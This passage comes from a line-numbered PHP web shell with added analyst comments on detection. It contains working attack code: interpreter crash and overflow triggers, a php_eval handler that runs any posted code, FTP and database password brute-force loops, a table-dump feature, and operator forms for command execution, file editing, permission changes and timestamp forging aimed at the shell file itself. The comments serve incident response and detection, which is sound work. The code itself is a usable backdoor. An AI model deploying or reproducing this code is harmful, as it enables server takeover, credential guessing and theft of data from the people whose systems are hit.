5926 @htmlentities($str1, ENT_NOQUOTES, "UTF-8");
5927
5928 break;
5929
5930 case 'dos16':
5931
5932 $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);
5933
5934 for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));
5935
5936 unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);
5937
5938 break;
5939
5940 case 'dos17':
5941
5942 $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU";
5943
5944 $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD";
5945
5946 $x = "AQ ";
5947
5948 unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);
5949
5950 break;
5951
5952 case 'dos18':
5953
5954 $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);
5955
5956 if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err))
5957
5958 echo "Msg not sent because $msg_err\n";
5959
5960 if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) {
5961
5962 echo "$msg\n";
5963
5964 } else { echo "Received $msg_error fetching message\n"; break; }
5965
5966 @msg_remove_queue ($msg_id);
5967
5968 break;
5969
5970 case 'dos19':
5971
5972 $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");
5973
5974 break;
5975
5976 case 'dos20':
5977
5978 $hashtable = str_repeat("A", 39);
5979
5980 $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);
5981
5982 $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);
5983
5984 $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';
5985
5986 for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }
5987
5988 $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';
5989
5990 @unserialize($str);
5991
5992 break;
5993
5994 case 'dos21':
5995
5996 imagecreatetruecolor(1234,1073741824);
5997
5998 break;
5999
6000 case 'dos22':
6001
6002 imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),imagecreatetruecolor(120, 120), 0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
6003
6004 break;
6005
6006 case 'dos23':
6007
6008 $a = str_repeat ("A",9989776); $b = str_repeat("/", 2798349); iconv_substr($a,0,1,$b);
6009
6010 break;
6011
6012 case 'dos24':
6013
6014 setlocale(LC_COLLATE, str_repeat("A", 34438013));
6015
6016 break;
6017
6018 case 'dos25':
6019
6020 glob(str_repeat("A", 9638013));
6021
6022 break;
6023
6024 case 'dos26':
6025
6026 glob("a",-1);
6027
6028 break;
6029
6030 case 'dos27':
6031
6032 fnmatch("*[1]e", str_repeat("A", 9638013));
6033
6034 break;
6035
6036 case 'dos28':
6037
6038 if (extension_loaded("gd")){ $buff = str_repeat("A",9999); $res = imagepsloadfont($buff); echo "boom!!\n";}
6039
6040 break;
6041
6042 case 'dos29':
6043
6044 if(function_exists('msql_connect')){ msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A',49424).'BBBB');}
6045
6046 break;
6047
6048 case 'dos30':
6049
6050 $a=str_repeat("A", 65535); $b=1; $c=str_repeat("A", 65535); chunk_split($a,$b,$c);
6051
6052 break;
6053
6054 case 'dos31':
6055
6056 if (extension_loaded("win32std") ) { win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );}
6057
6058 break;
6059
6060 case 'dos32':
6061
6062 if (extension_loaded( "iisfunc" ) ){ $buf_unicode = str_repeat( "A", 256 ); $eip_unicode = "\x41\x41"; iis_getservicestate( $buf_unicode . $eip_unicode );}
6063
6064 break;
6065
6066 case 'dos33':
6067
6068 $buff = str_repeat("\x41", 250);$get_EIP = "\x42\x42";$get_ESP = str_repeat("\x43", 100);$get_EBP = str_repeat("\x44", 100);ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP);
6069
6070 break;
6071
6072 case 'dos34':
6073
6074 if (extension_loaded("bz2")){ $buff = str_repeat("a",1000); com_print_typeinfo($buff);}
6075
6076 break;
6077
6078 case 'dos35':
6079
6080 $a = str_repeat("/", 4199000); iconv(1, $a, 1);
6081
6082 break;
6083
6084 case 'dos36':
6085
6086 $a = str_repeat("/", 2991370); iconv_mime_decode_headers(0, 1, $a);
6087
6088 break;
6089
6090 case 'dos37':
6091
6092 $a = str_repeat("/", 3799000); iconv_mime_decode(1, 0, $a);
6093
6094 break;
6095
6096 case 'dos38':
6097
6098 $a = str_repeat("/", 9791999); iconv_strlen(1, $a);
6099
6100 break;
6101
6102}
6103
6104
6105
// Analyst note: arbitrary PHP execution. The php_eval POST field has PHP open and close tag
// markers stripped and is then passed to eval(); errors are suppressed with '@'.
// Nothing is written to disk, so the executed code leaves no file artefact. The request
// body is the only record, which is why POST-body logging or a WAF rule on cmd=php_eval
// matters for detection.
6106if ($_POST['cmd']=="php_eval"){
6107
6108 $eval = @str_replace("<?","",$_POST['php_eval']);
6109
6110 $eval = @str_replace("?>","",$eval);
6111
6112 @eval($eval);}
6113
6114
6115
// Analyst note: FTP credential-guessing loop. $users, $ftp_server and $ftp_port are set by
// the pre-flight block earlier in the script.
//   brute_method == 'passwd': each entry is tried as both login and password, and with
//                             'reverse' set the reversed name is tried as the password too.
//   brute_method == 'dic'   : each entry is tried as the password for $_POST['ftp_login'].
// A fresh connection is opened per candidate. Hits are printed as "[+] login:password -
// success", then totals are printed using two $lang strings defined outside this excerpt.
// Detection: a burst of FTP authentication failures whose source is the web server itself
// (often 127.0.0.1 or an internal address). Mitigation: login throttling and lockout on the
// FTP service, and no FTP accounts whose password equals the account name.
6116if ($_POST['cmd']=="ftp_brute")
6117
6118 {
6119
6120 $suc = 0;
6121
6122 if($_POST['brute_method']=='passwd'){
6123
6124 foreach($users as $user)
6125
6126 {
6127
6128 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6129
6130 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
6131
6132 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
6133
6134 @ftp_close($connection);
6135
6136 }
6137
6138 }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){
6139
6140 foreach($users as $user)
6141
6142 {
6143
6144 $connection = @ftp_connect($ftp_server,$ftp_port,10);
6145
6146 if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }
6147
6148 @ftp_close($connection);
6149
6150 }
6151
6152 }
6153
6154 echo "\r\n-------------------------------------\r\n";
6155
6156 $count = count($users);
6157
 // With 'reverse' in passwd mode two passwords are counted per account.
6158 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6159
6160 echo $lang[$language.'_text97'].$count."\r\n";
6161
6162 echo $lang[$language.'_text98'].$suc."\r\n";
6163
6164 }
6165
6166
6167
// Analyst note: database credential-guessing loop. It mirrors the FTP loop but goes through
// the my_sql class (defined outside this excerpt). The db field presumably selects the
// database driver -- confirm against the class. Host and port come from db_server and
// db_port.
//   brute_method == 'passwd': each $users entry is tried as login == password, then, if
//                             'reverse' is set, a second pass tries the reversed name.
//   brute_method == 'dic'   : each entry is tried as the password for $_POST['mysql_l'].
// Detection: runs of failed logins in the database's authentication or error log that
// originate from the web server, for many different account names within seconds.
// Mitigation: database accounts restricted by source host, connection-failure throttling,
// and no accounts whose password equals the user name.
6168if ($_POST['cmd']=="db_brute")
6169
6170 {
6171
6172 $suc = 0;
6173
6174 if($_POST['brute_method']=='passwd'){
6175
6176 foreach($users as $user)
6177
6178 {
6179
6180 $sql = new my_sql();
6181
6182 $sql->db = $_POST['db'];
6183
6184 $sql->host = $_POST['db_server'];
6185
6186 $sql->port = $_POST['db_port'];
6187
6188 $sql->user = $user;
6189
6190 $sql->pass = $user;
6191
6192 if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }
6193
6194 }
6195
6196 if(isset($_POST['reverse']))
6197
6198 {
6199
6200 foreach($users as $user)
6201
6202 {
6203
6204 $sql = new my_sql();
6205
6206 $sql->db = $_POST['db'];
6207
6208 $sql->host = $_POST['db_server'];
6209
6210 $sql->port = $_POST['db_port'];
6211
6212 $sql->user = $user;
6213
6214 $sql->pass = strrev($user);
6215
6216 if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }
6217
6218 }
6219
6220 }
6221
6222 }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){
6223
6224 foreach($users as $user)
6225
6226 {
6227
6228 $sql = new my_sql();
6229
6230 $sql->db = $_POST['db'];
6231
6232 $sql->host = $_POST['db_server'];
6233
6234 $sql->port = $_POST['db_port'];
6235
6236 $sql->user = $_POST['mysql_l'];
6237
6238 $sql->pass = $user;
6239
6240 if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }
6241
6242 }
6243
6244 }
6245
6246 echo "\r\n-------------------------------------\r\n";
6247
6248 $count = count($users);
6249
 // With 'reverse' in passwd mode two passwords are counted per account.
6250 if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }
6251
6252 echo $lang[$language.'_text97'].$count."\r\n";
6253
6254 echo $lang[$language.'_text98'].$suc."\r\n";
6255
6256 }
6257
6258
6259
// Analyst note: table dump feature. It connects through the my_sql class (defined outside
// this excerpt) with POST-supplied server, port, login, password and database name, then
// calls dump() for the table named in mysql_tbl.
// Output goes to the report textarea, or, when 'dif' is set, is appended line by line to
// the file named in dif_name through morewrite() (defined outside this excerpt). A marker
// line "mysql_dump" is written to that file first.
// Detection: full-table reads issued by the application's database account outside normal
// query patterns, and dump files appearing in web-writable directories. Treat any such file
// as exposed data during incident response.
6260if ($_POST['cmd']=="mysql_dump")
6261
6262 {
6263
6264 if(isset($_POST['dif'])) { morewrite($_POST['dif_name'], "mysql_dump\r\n"); }
6265
6266 $sql = new my_sql();
6267
6268 $sql->db = $_POST['db'];
6269
6270 $sql->host = $_POST['db_server'];
6271
6272 $sql->port = $_POST['db_port'];
6273
6274 $sql->user = $_POST['mysql_l'];
6275
6276 $sql->pass = $_POST['mysql_p'];
6277
6278 $sql->base = $_POST['mysql_db'];
6279
6280 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
6281
6282 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
6283
6284 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
6285
6286 else {
6287
6288 if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
6289
6290 else if(@is_writable($_POST['dif_name'])){ foreach($sql->dump as $v){ morewrite($_POST['dif_name'], $v."\r\n");} }
6291
6292 else { echo "[-] ERROR! Can't write in dump file"; }
6293
6294 }
6295
6296 }
6297
6298
6299
6300echo "</textarea></div>";
6301
6302echo "</b>";
6303
6304echo "</td></tr></table>";
6305
6306echo "<table width=100% cellpadding=0 cellspacing=0>";
6307
6308
6309
/**
 * Builds the clickable heading for a collapsible panel of the UI.
 *
 * Returns an anchor whose onClick calls the client-side function change_divst()
 * (defined outside this excerpt) with the panel id. $title and $id are concatenated
 * into the markup without escaping.
 *
 * @param string $title Heading text or markup shown to the operator.
 * @param string $id    Panel id passed to change_divst().
 * @return string HTML anchor element.
 */
6310function div_title($title, $id)
6311
6312{
6313
6314 return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
6315
6316}
6317
/**
 * Returns the opening div tag for a UI panel, hidden or visible.
 *
 * The panel state is kept in a cookie named after the panel id. The panel is rendered
 * hidden when that cookie is set and loosely equal to 0, or when the cookie is empty and
 * the id is in the hard-coded list of panels that start collapsed. Otherwise it is visible.
 * Analyst note: the per-panel cookies (id1, id2, ...) are a client-side artefact of a
 * session with this script.
 *
 * @param string $id Panel id, also used as the cookie name.
 * @return string Opening div tag; the caller emits the closing tag.
 */
6318function div($id)
6319
6320 {
6321
6322 if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return '<div id="'.$id.'" style="display: none;">';
6323
 // Panels that are collapsed by default when no cookie has been stored yet.
6324 $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38','id39');
6325
6326 if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return '<div id="'.$id.'" style="display: none;">';
6327
6328 return '<div id="'.$id.'">';
6329
6330 }
6331
6332
6333
// Analyst note: renders the first operator forms. sr(), in() and ws() plus the $fs, $fe,
// $ts, $te and $table_* fragments are defined outside this excerpt; from their use here
// in() presumably emits an input element with the given type, name, size and value.
//   safe_mode off : free-text "cmd" field and a "dir" field (panel id1).
//   safe_mode on  : "dir" field only, with a hidden cmd=safe_dir (panel id2).
//   always        : file-edit form posting e_name with a hidden cmd=edit_file (panel id3).
// Detection: the POST field names cmd, dir and e_name and the hidden values safe_dir and
// edit_file can be matched in request logs or WAF rules to find use of this script.
6334if(!$safe_mode){
6335
6336echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
6337
6338echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
6339
6340echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6341
6342echo $te.'</div>'.$table_end1.$fe;
6343
6344}
6345
6346else{
6347
6348echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
6349
6350echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
6351
6352echo $te.'</div>'.$table_end1.$fe;
6353
6354}
6355
6356echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
6357
6358echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
6359
6360echo $te.'</div>'.$table_end1.$fe;
6361
6362
6363
// Analyst note: shown only when $safe_mode or $open_basedir is set. It renders a form
// (panel id4) that posts mk_name, an action of create or delete, a target kind of file or
// dir, and a hidden cmd=mk. The handler for cmd=mk is outside this excerpt.
// The previously posted mk_name is echoed back into the form through in().
6364if($safe_mode || $open_basedir){
6365
6366echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
6367
6368echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
6369
6370echo $te.'</div>'.$table_end1.$fe;
6371
6372}
6373
6374
6375
// Web-shell UI: file-timestamp panel, rendered only on unix when touch() exists.
// Fields: `file_name` (target; defaults to $_SERVER["SCRIPT_FILENAME"], i.e.
// this script itself), `file_name_r` (a second file path - presumably a
// reference file whose times are reused; the handler is outside this excerpt),
// and explicit day / month / year / chasi (hour) / minutes / second selectors,
// submitted with hidden cmd=touch and `dir`.
// NOTE(review): the option lists have quirks that matter when interpreting
// timestamps on a host where this form was used: the year entries labelled
// 2007-2010 all submit value="2006", the hour list runs 01-24, and the minute
// and second lists run 01-59, so 00 cannot be selected from this form.
// NOTE(review): forensic consequence - on a compromised host treat mtime/atime
// of files (including the shell file itself, given the default target) as
// attacker-controllable. Build the timeline from inode change time, web-server
// access logs, backups and file-integrity baselines instead.
6376if($unix && @function_exists('touch')){
6377
6378echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
6379
6380echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($_SERVER["SCRIPT_FILENAME"])))
6381
6382.ws(4)."<b>".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow."</b>"
6383
6384.ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
6385
6386echo sr(15,"<b> or set Day".$arrow."</b>",
6387
6388'
6389
6390<select name="day" size="1">
6391
6392<option value="01">1</option>
6393
6394<option value="02">2</option>
6395
6396<option value="03">3</option>
6397
6398<option value="04">4</option>
6399
6400<option value="05">5</option>
6401
6402<option value="06">6</option>
6403
6404<option value="07">7</option>
6405
6406<option value="08">8</option>
6407
6408<option value="09">9</option>
6409
6410<option value="10">10</option>
6411
6412<option value="11">11</option>
6413
6414<option value="12">12</option>
6415
6416<option value="13">13</option>
6417
6418<option value="14">14</option>
6419
6420<option value="15">15</option>
6421
6422<option value="16">16</option>
6423
6424<option value="17">17</option>
6425
6426<option value="18">18</option>
6427
6428<option value="19">19</option>
6429
6430<option value="20">20</option>
6431
6432<option value="21">21</option>
6433
6434<option value="22">22</option>
6435
6436<option value="23">23</option>
6437
6438<option value="24">24</option>
6439
6440<option value="25">25</option>
6441
6442<option value="26">26</option>
6443
6444<option value="27">27</option>
6445
6446<option value="28">28</option>
6447
6448<option value="29">29</option>
6449
6450<option value="30">30</option>
6451
6452<option value="31">31</option>
6453
6454</select>'
6455
6456.ws(4)."<b>Month".$arrow."</b>"
6457
6458.'
6459
6460<select name="month" size="1">
6461
6462<option value="January">January</option>
6463
6464<option value="February">February</option>
6465
6466<option value="March">March</option>
6467
6468<option value="April">April</option>
6469
6470<option value="May">May</option>
6471
6472<option value="June">June</option>
6473
6474<option value="July">July</option>
6475
6476<option value="August">August</option>
6477
6478<option value="September">September</option>
6479
6480<option value="October">October</option>
6481
6482<option value="November">November</option>
6483
6484<option value="December">December</option>
6485
6486</select>'
6487
6488.ws(4)."<b>Year".$arrow."</b>"
6489
6490.'
6491
6492<select name="year" size="1">
6493
6494<option value="1998">1998</option>
6495
6496<option value="1999">1999</option>
6497
6498<option value="2000">2000</option>
6499
6500<option value="2001">2001</option>
6501
6502<option value="2002">2002</option>
6503
6504<option value="2003">2003</option>
6505
6506<option value="2004">2004</option>
6507
6508<option value="2005">2005</option>
6509
6510<option value="2006">2006</option>
6511
6512<option value="2006">2007</option>
6513
6514<option value="2006">2008</option>
6515
6516<option value="2006">2009</option>
6517
6518<option value="2006">2010</option>
6519
6520</select>'
6521
6522.ws(4)."<b>Hour".$arrow."</b>"
6523
6524.'
6525
6526<select name="chasi" size="1">
6527
6528<option value="01">01</option>
6529
6530<option value="02">02</option>
6531
6532<option value="03">03</option>
6533
6534<option value="04">04</option>
6535
6536<option value="05">05</option>
6537
6538<option value="06">06</option>
6539
6540<option value="07">07</option>
6541
6542<option value="08">08</option>
6543
6544<option value="09">09</option>
6545
6546<option value="10">10</option>
6547
6548<option value="11">11</option>
6549
6550<option value="12">12</option>
6551
6552<option value="13">13</option>
6553
6554<option value="14">14</option>
6555
6556<option value="15">15</option>
6557
6558<option value="16">16</option>
6559
6560<option value="17">17</option>
6561
6562<option value="18">18</option>
6563
6564<option value="19">19</option>
6565
6566<option value="20">20</option>
6567
6568<option value="21">21</option>
6569
6570<option value="22">22</option>
6571
6572<option value="23">23</option>
6573
6574<option value="24">24</option>
6575
6576</select>'
6577
6578.ws(4)."<b>Minute".$arrow."</b>"
6579
6580.'
6581
6582<select name="minutes" size="1">
6583
6584<option value="01">1</option>
6585
6586<option value="02">2</option>
6587
6588<option value="03">3</option>
6589
6590<option value="04">4</option>
6591
6592<option value="05">5</option>
6593
6594<option value="06">6</option>
6595
6596<option value="07">7</option>
6597
6598<option value="08">8</option>
6599
6600<option value="09">9</option>
6601
6602<option value="10">10</option>
6603
6604<option value="11">11</option>
6605
6606<option value="12">12</option>
6607
6608<option value="13">13</option>
6609
6610<option value="14">14</option>
6611
6612<option value="15">15</option>
6613
6614<option value="16">16</option>
6615
6616<option value="17">17</option>
6617
6618<option value="18">18</option>
6619
6620<option value="19">19</option>
6621
6622<option value="20">20</option>
6623
6624<option value="21">21</option>
6625
6626<option value="22">22</option>
6627
6628<option value="23">23</option>
6629
6630<option value="24">24</option>
6631
6632<option value="25">25</option>
6633
6634<option value="26">26</option>
6635
6636<option value="27">27</option>
6637
6638<option value="28">28</option>
6639
6640<option value="29">29</option>
6641
6642<option value="30">30</option>
6643
6644<option value="31">31</option>
6645
6646<option value="32">32</option>
6647
6648<option value="33">33</option>
6649
6650<option value="34">34</option>
6651
6652<option value="35">35</option>
6653
6654<option value="36">36</option>
6655
6656<option value="37">37</option>
6657
6658<option value="38">38</option>
6659
6660<option value="39">39</option>
6661
6662<option value="40">40</option>
6663
6664<option value="41">41</option>
6665
6666<option value="42">42</option>
6667
6668<option value="43">43</option>
6669
6670<option value="44">44</option>
6671
6672<option value="45">45</option>
6673
6674<option value="46">46</option>
6675
6676<option value="47">47</option>
6677
6678<option value="48">48</option>
6679
6680<option value="49">49</option>
6681
6682<option value="50">50</option>
6683
6684<option value="51">51</option>
6685
6686<option value="52">52</option>
6687
6688<option value="53">53</option>
6689
6690<option value="54">54</option>
6691
6692<option value="55">55</option>
6693
6694<option value="56">56</option>
6695
6696<option value="57">57</option>
6697
6698<option value="58">58</option>
6699
6700<option value="59">59</option>
6701
6702</select>'
6703
6704.ws(4)."<b>Second".$arrow."</b>"
6705
6706.'
6707
6708<select name="second" size="1">
6709
6710<option value="01">1</option>
6711
6712<option value="02">2</option>
6713
6714<option value="03">3</option>
6715
6716<option value="04">4</option>
6717
6718<option value="05">5</option>
6719
6720<option value="06">6</option>
6721
6722<option value="07">7</option>
6723
6724<option value="08">8</option>
6725
6726<option value="09">9</option>
6727
6728<option value="10">10</option>
6729
6730<option value="11">11</option>
6731
6732<option value="12">12</option>
6733
6734<option value="13">13</option>
6735
6736<option value="14">14</option>
6737
6738<option value="15">15</option>
6739
6740<option value="16">16</option>
6741
6742<option value="17">17</option>
6743
6744<option value="18">18</option>
6745
6746<option value="19">19</option>
6747
6748<option value="20">20</option>
6749
6750<option value="21">21</option>
6751
6752<option value="22">22</option>
6753
6754<option value="23">23</option>
6755
6756<option value="24">24</option>
6757
6758<option value="25">25</option>
6759
6760<option value="26">26</option>
6761
6762<option value="27">27</option>
6763
6764<option value="28">28</option>
6765
6766<option value="29">29</option>
6767
6768<option value="30">30</option>
6769
6770<option value="31">31</option>
6771
6772<option value="32">32</option>
6773
6774<option value="33">33</option>
6775
6776<option value="34">34</option>
6777
6778<option value="35">35</option>
6779
6780<option value="36">36</option>
6781
6782<option value="37">37</option>
6783
6784<option value="38">38</option>
6785
6786<option value="39">39</option>
6787
6788<option value="40">40</option>
6789
6790<option value="41">41</option>
6791
6792<option value="42">42</option>
6793
6794<option value="43">43</option>
6795
6796<option value="44">44</option>
6797
6798<option value="45">45</option>
6799
6800<option value="46">46</option>
6801
6802<option value="47">47</option>
6803
6804<option value="48">48</option>
6805
6806<option value="49">49</option>
6807
6808<option value="50">50</option>
6809
6810<option value="51">51</option>
6811
6812<option value="52">52</option>
6813
6814<option value="53">53</option>
6815
6816<option value="54">54</option>
6817
6818<option value="55">55</option>
6819
6820<option value="56">56</option>
6821
6822<option value="57">57</option>
6823
6824<option value="58">58</option>
6825
6826<option value="59">59</option>
6827
6828</select>'
6829
6830.in('hidden','cmd',0,'touch')
6831
6832.in('hidden','dir',0,$dir)
6833
6834.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6835
6836echo $te.'</div>'.$table_end1.$fe;
6837
6838}
6839
6840
6841
// Web-shell UI: permission / ownership panel.
// $select collects one <option> per available function (chmod -> mod,
// chown -> own, chgrp -> grp); the panel is rendered only on unix and only if
// at least one of them exists. Fields: `param1` (path; defaults to
// $_SERVER["SCRIPT_FILENAME"]), `what` (mod|own|grp), `param2` (default "0777"),
// hidden cmd=ch_ and `dir`. The handler is outside this excerpt.
// The leading @ on sr() suppresses the notices raised by reading unset
// $_POST['param1'] / $_POST['param2'] in the ternaries.
// The name argument 'param2 title="..."' smuggles an extra attribute through
// in(), which implies in() interpolates the name without quoting - TODO confirm.
// NOTE(review): world-writable modes appearing on files under the document
// root, or ownership changes made by the web-server account, are useful
// file-integrity alerts for this kind of activity.
6842$select='';
6843
6844if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
6845
6846if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
6847
6848if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
6849
6850if($unix && $select){
6851
6852echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
6853
6854echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6855
6856echo $te.'</div>'.$table_end1.$fe;
6857
6858}
6859
6860
6861
// Web-shell UI: alias picker, rendered only when $safe_mode is off.
// $aliases is defined outside this excerpt; only its keys are emitted as
// <option> labels ($alias_cmd is unused in this loop), so the mapped values
// never reach the page. The form submits `alias` and `dir`; no hidden `cmd`
// field is set here, so the handler presumably keys on `alias` - TODO confirm.
// NOTE(review): because only the alias name travels in the request, request
// logging will show the name rather than what it maps to; the mapping has to
// be read from the $aliases definition in the recovered file.
6862if(!$safe_mode){
6863
6864$aliases2 = '';
6865
6866foreach ($aliases as $alias_name=>$alias_cmd)
6867
6868 {
6869
6870 $aliases2 .= "<option>$alias_name</option>";
6871
6872 }
6873
6874echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
6875
6876echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6877
6878echo $te.'</div>'.$table_end1.$fe;
6879
6880}
6881
6882
6883
// Web-shell UI: text-search panel, rendered unconditionally.
// Fields: `s_text` (default 'text'), `s_dir` (pre-filled with $dir; the hint
// shows a ;-separated list form), checkbox `m`, `s_mask` (default '.txt;.php'),
// hidden cmd=search_text and `dir`. The handler is outside this excerpt.
// NOTE(review): for incident response, assume any file readable by the
// web-server account under the searched directories may have been read, and
// rotate secrets kept in configuration files there.
6884echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
6885
6886echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6887
6888echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6889
6890echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
6891
6892echo $te.'</div>'.$table_end1.$fe;
6893
6894
6895
// Web-shell UI: second text-search panel, rendered only on unix with
// $safe_mode off. It reuses the field names of the previous search panel
// (`s_text`, `s_dir`, `s_mask`) but posts hidden cmd=find_text and defaults the
// mask to the glob-style '*.[hc]'. The handler is outside this excerpt.
// NOTE(review): the two search panels differ only in the `cmd` value, so any
// request-body detection has to key on cmd=search_text / cmd=find_text rather
// than on the shared field names.
6896if(!$safe_mode && $unix){
6897
6898echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
6899
6900echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6901
6902echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )");
6903
6904echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
6905
6906echo $te.'</div>'.$table_end1.$fe;
6907
6908}
6909
6910
6911
// Web-shell UI: PHP code panel, rendered unconditionally.
// A <textarea name=php_eval> is filled with the previously posted value or,
// on first load, three commented-out sample lines; the form posts hidden
